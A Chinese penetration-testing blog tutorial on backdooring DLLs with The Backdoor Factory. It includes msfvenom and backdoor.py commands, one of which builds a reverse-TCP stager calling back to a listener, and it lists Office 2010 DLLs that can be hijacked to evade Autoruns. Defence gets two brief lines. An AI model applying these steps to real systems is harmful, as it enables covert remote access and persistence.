利用BDF向DLL文件植入后门
0x00 前言
在之前的文章《利用BDF向EXE文件植入后门》介绍了使用The Backdoor Factory向EXE文件植入后门的方法,这次将要介绍向DLL文件植入后门的思路,演示一种DLL劫持的利用方法,总结该方法的特点,分析防御思路
0x01 简介
本文将要介绍以下内容:
- 劫持自己的DLL,修复BUG
- 劫持系统的DLL,绕过Autoruns的后门检测
0x02 利用思路
DLL同EXE文件的植入思路相同,也是通过修改程序的执行流程,跳转到Code Caves,执行payload,再返回至程序的正常流程
DLL同EXE文件最大的区别是多了导出函数的功能
在实现DLL劫持时,常常需要获得原DLL的导出函数,模拟导出函数,添加payload,实现利用
那么,The Backdoor Factory在DLL文件的后门植入上,是否要考虑导出函数呢?
下面进行测试,得出结论
0x03 编写程序进行测试
测试Dll testdll.dll:
#include <windows.h>
#include <stdio.h>
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
//MessageBox(NULL, NULL, NULL, 0);
//Sleep(5000);
printf("[+] DLL_PROCESS_ATTACH\n");
case DLL_THREAD_ATTACH:
printf("[+] DLL_THREAD_ATTACH\n");
case DLL_THREAD_DETACH:
printf("[+] DLL_THREAD_DETACH\n");
case DLL_PROCESS_DETACH:
printf("[+] DLL_PROCESS_DETACH\n");
break;
}
return TRUE;
}
void Export1()
{
printf("[+] Export1\n");
}
导出函数为Export1
Dll加载程序 loader.exe:
#include <windows.h>
typedef void(*Export)();
int main(int argc, char* argv[])
{
Export exporttest;
printf("[*] LoadLibrary\n");
HMODULE hDllLib = LoadLibrary("testdll.dll");
exporttest=(Export)GetProcAddress(hDllLib ,"Export1");
exporttest();
Sleep(10000);
FreeLibrary(hDllLib);
printf("[*] FreeLibrary\n");
return 0;
}
程序执行如下图,加载testdll.dll,调用导出函数Export1
使用The Backdoor Factory为DLL文件添加后门:
msfvenom -p windows/exec CMD=calc.exe -f raw >calc.bin
./backdoor.py -f testdll.dll -s user_supplied_shellcode_threaded -U calc.bin -a
再次执行loader.exe,测试如下图
成功执行payload,但是改变了程序流程,无法正常返回FreeLibrary
需要对DLL进行调试,找到出错的原因
首先生成空的跳转模板:
./backdoor.py -f testdll.dll -s cave_miner_inline
选择.text段
执行Loader.exe,程序一切正常,那么就是中间的payload出了问题
使用Immunity Debugger打开新的testdll.dll,找到劫持的位置,payload保存在0x10005716
如下图
这里可以推测,payload只要能够保持堆栈平衡,那么就不会影响程序的正常执行
接下来,在0x10005716处填入我们的payload
可以使用CFF Explorer添加payload
首先定位payload起始点
PUSHAD
PUSHFD
对应的16进制代码为609C
在CFF Explorer中切换到Hex Editor视图,搜索609C,定位起始点0x0000571A
注:
通过Immunity Debugger获得的内存虚拟地址为0x1000571A,二者对应,位置正确
为了扩大payload空间,可以将后面的调整堆栈平衡代码整体后移
如下图
将0x0005772-0x0000579E的数据整体后移,中间填入0x90
选中该部分内容,右键-Copy-Hex
找到合适的位置,右键-Fill With...
完整操作如下图
依此方法,中间填入修改后的payload即可,完成Bug修复
通过Immunity Debugger查看DLL文件,可以看到The Backdoor Factory对DLL和EXE文件进行跳转劫持的位置一样
如下图
得出结论:
对于DLL文件来说,劫持初始化部分造成的结果是在LoadLibrary时即可执行payload,如果想在程序加载DLL导出函数时执行payload,将跳转代码改到导出函数内即可
0x04 劫持系统的DLL
针对Office 2010,分享几个自己找到的DLL劫持利用位置
1、劫持Word-审阅试图
LOCALSVC.DLL,位于C:\Program Files\Common Files\microsoft shared\RRLoc14\
对该dll添加payload
./backdoor.py -f LOCALSVC.DLL -H 192.168.81.192 -P 4444 -s reverse_tcp_stager_threaded
替换dll(需要管理员权限),启动word.exe,切换至审阅视图,弹回meterpreter
测试如下图
2、劫持word-插入-图片
tiptsf.dll,位于C:\Program Files\Common Files\microsoft shared\ink\
需要TrustedInstaller权限才能替换
关于如何获得TrustedInstaller权限,可参考文章《渗透技巧——Token窃取与利用》
3、劫持word-文件
也影响别的位置:
word -页面布局-主题-浏览主题
GrooveIntlResource.dll,位于C:\Program Files\Microsoft Office\Office14\2052
需要管理员权限
4、劫持Excel-插入-图片
MSPTLS.DLL,位于C:\Program Files\Common Files\microsoft shared\OFFICE14\
需要管理员权限
以上测试如下图
注:
本节内容仅为了演示DLL劫持的一些利用方法,这些特殊的劫持位置只会在软件的特定功能打开时才会启动,所以能够绕过Autoruns的检测
0x05 防御
对于系统DLL,通过会带有微软签名,如果对DLL植入后门,签名会失效,这是一个老生常谈的问题
而对于第三方开发的软件,调用的第三方DLL不加签名,那么被利用的风险很大
0x06 小结
本文测试了使用The Backdoor Factory向DLL文件植入后门的方法,介绍修复BUG的思路,分享了一种DLL劫持的利用方法,仅供测试,通过总结该利用方法的特点,简要介绍了防御方面需要注意的问题